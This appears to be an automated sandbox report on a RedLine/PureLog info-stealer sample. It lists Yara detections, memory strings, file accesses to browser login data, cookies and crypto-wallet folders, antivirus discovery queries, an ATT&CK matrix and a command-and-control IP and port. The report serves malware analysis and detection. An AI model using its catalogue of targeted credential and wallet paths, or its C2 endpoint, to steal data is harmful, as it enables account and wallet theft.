Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Users\user\Desktop\chTJmCR9bS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.chTJmCR9bS.exe.5cd0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3721508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.34ff6fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3446d9c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823596554.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7572, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: chTJmCR9bS.exe, 00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7572, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.chTJmCR9bS.exe.5cd0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3721508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.34ff6fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.3446d9c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823596554.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chTJmCR9bS.exe PID: 7572, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
chTJmCR9bS.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
chTJmCR9bS.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
185.222.57.84:55615	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlQ	0%	Avira URL Cloud	safe
http://185.222.57.84:55615	0%	Avira URL Cloud	safe
http://185.222.57.84:55615t-	0%	Avira URL Cloud	safe
http://185.222.57.84:5	0%	Avira URL Cloud	safe
http://185.222.57.84:55615/	0%	Avira URL Cloud	safe
http://www.sakkal.com&	0%	Avira URL Cloud	safe
http://www.itcfonts.k	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb.cdn.cloudflare.net	104.26.12.31	true	false		high
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
185.222.57.84:55615	true	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip	false		high
http://185.222.57.84:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://www.fontbureau.com/designersG	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://www.fontbureau.com/designers/?	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.57.84:55615	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003470000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ascendercorp.com/typedesigners.htmlQ	chTJmCR9bS.exe, 00000000.00000002.1827074735.00000000062B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://www.fontbureau.com/designers	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/D	chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.57.84:5	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003470000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
